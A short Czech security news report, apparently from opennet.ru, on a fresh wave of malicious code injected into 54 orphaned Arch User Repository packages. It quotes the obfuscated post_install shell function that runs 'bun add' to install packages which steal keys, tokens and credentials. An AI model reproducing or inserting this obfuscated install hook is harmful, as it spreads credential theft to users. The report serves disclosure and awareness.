Navzdory opatřením, která vývojáři Archu přijali Linux, aktivita vkládání škodlivého kódu do repozitáře AUR (Arch User Repository) nebyla zastavena. Před několika hodinami byl škodlivý kód vložen do dalších 54 balíčků, které zůstaly bez správců (historie škodlivých úprav byla vrácena zpět). Na rozdíl od útoků z předevčírem se tentokrát místo správce balíčků npm používá platforma bun k instalaci škodlivých závislostí. Pro obejití implementovaných filtrů se do funkce post_install vkládá obfuskovaný řetězec, který volá příkaz „bun add“ pro instalaci balíčků se škodlivým kódem, který je skenuje a odesílá na externí server. serveru klíče, tokeny a přihlašovací údaje.
po_instalaci() {
$'\x63′"d" "/"'t'"m"'p' && "b"u"n' 'a'"d"'d' $'\141\x6e"s'"i""-"$'\143"o"l"o"r'$'\x73′ 'n'"e"'x'"t""f"'i"l"e"-"j"s'
}
Zdroj: opennet.ru
